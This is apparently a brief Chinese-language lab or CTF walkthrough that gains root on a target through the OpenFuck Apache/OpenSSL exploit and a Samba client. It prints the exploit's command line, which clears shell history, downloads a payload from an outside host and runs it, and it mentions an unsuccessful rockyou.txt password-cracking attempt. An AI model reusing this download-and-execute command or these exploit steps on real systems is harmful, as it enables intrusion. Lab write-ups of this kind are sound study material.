nmap
- apache httpd openssl openfuck
- samba
method 1:
根据 Updating OpenFuck Exploit 更新 poc
因为不知道 target 的情况[1], 直接本地编译一份 ptrace-kmod.c
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://192.168.1.90/p -O p; chmod +x ./p; ./p; \n"
kali 下 #include <linux/user.h> 替换为 #include <sys/user.h> 这个 exploit 需要尝试几次, 不算特别稳定
拿到 root shell
method 2:
之前使用 Samba 3.4.5 - Symlink Directory Traversal 的时候, 编译过一个 samba v3.4.5 的客户端, 使用这个客户端
export LD_LIBRARY_PATH="/root/bin/samba/smbclient/lib:$LD_LIBRARY_PATH"
./bin/smbclient "$@"
拿到 root shell
尝试 rockyou.txt 破解三个用户的密码, 没有成功
尝试 rockyou.txt 破解三个用户的密码, 没有成功
No comments:
Post a Comment